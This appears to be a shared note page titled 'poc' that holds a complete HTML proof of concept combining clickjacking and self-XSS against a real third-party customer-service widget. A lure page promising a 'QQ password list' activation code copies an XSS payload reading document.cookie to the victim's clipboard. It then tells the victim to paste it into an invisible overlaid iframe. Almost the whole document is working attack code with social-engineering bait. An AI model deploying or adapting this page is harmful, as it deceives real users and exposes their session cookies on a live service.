[关闭]
@1kbfree 2018-09-17T11:56:57.000000Z 字数 1407 阅读 926

poc

漏洞挖掘


  1. <html>
  2. <head>
  3. <meta charset="UTF-8">
  4. <style type="text/css">
  5. .testframe {
  6. height: 100%;
  7. }
  8. iframe {
  9. height: 100%;
  10. width: 100%;
  11. border: 0;
  12. margin: 0;
  13. padding: 0;
  14. /*控制不透明度的属性,兼容各大浏览器*/
  15. filter: alpha(Opacity=0); /*提供给IE浏览器8之前的*/
  16. -moz-opacity: 0; /*提供给火狐浏览器的*/
  17. -webkit-opacity: 0; /*提供给webkit内核的*/
  18. -khtml-opacity: 0; /*提供给KHTML内核的*/
  19. -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)"; /*提供给IE8之后的*/
  20. opacity: 0.01;
  21. /*控制不透明度的属性,兼容各大浏览器*/
  22. }
  23. #test {
  24. /*控制不透明度的属性,兼容各大浏览器*/
  25. filter: alpha(Opacity=0); /*提供给IE浏览器8之前的*/
  26. -moz-opacity: 0;
  27. -webkit-opacity: 0;
  28. -khtml-opacity: 0;
  29. -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";
  30. opacity: 0;
  31. position: absolute;
  32. margin: 100px;
  33. /*控制不透明度的属性,兼容各大浏览器*/
  34. }
  35. #submit {
  36. position: absolute;
  37. width: 555px;
  38. height: 66px;
  39. margin: 0 auto;
  40. left: 0;
  41. right: 250px;
  42. display: block;
  43. top: 550px;
  44. }
  45. </style>
  46. </head>
  47. <body>
  48. <input type="text" id="test" value="<img/src='x'/onerror=(alert)(document.cookie)>">
  49. <center>
  50. <h3>QQ密码大全(禁止外泄)</h3>
  51. <input type="submit" value="获取到激活码" onclick="cpy()">
  52. </center>
  53. <div class="testframe">
  54. <input type="text" id="submit" value="点击这里并且粘贴内容即可">
  55. <iframe src="https://qiyukf.com/client?k=c45f939a72580cebe93d08a1fe3e6460&robotShuntSwitch=1" frameborder="0" id="test0"></iframe>
  56. </div>
  57. <script type="text/javascript">
  58. function cpy(){
  59. // 当用户点击了id为test的那个标签他的粘贴板就会变成value里面的值
  60. var content=document.getElementById("test");
  61. content.select();
  62. document.execCommand("Copy");
  63. alert("注意:\n1、点击白色下面输入框,按ctrl+v或者直接粘贴激活码(因为是免费的所以隐藏掉了)");
  64. }
  65. </script>
  66. </body>
  67. </html>
添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注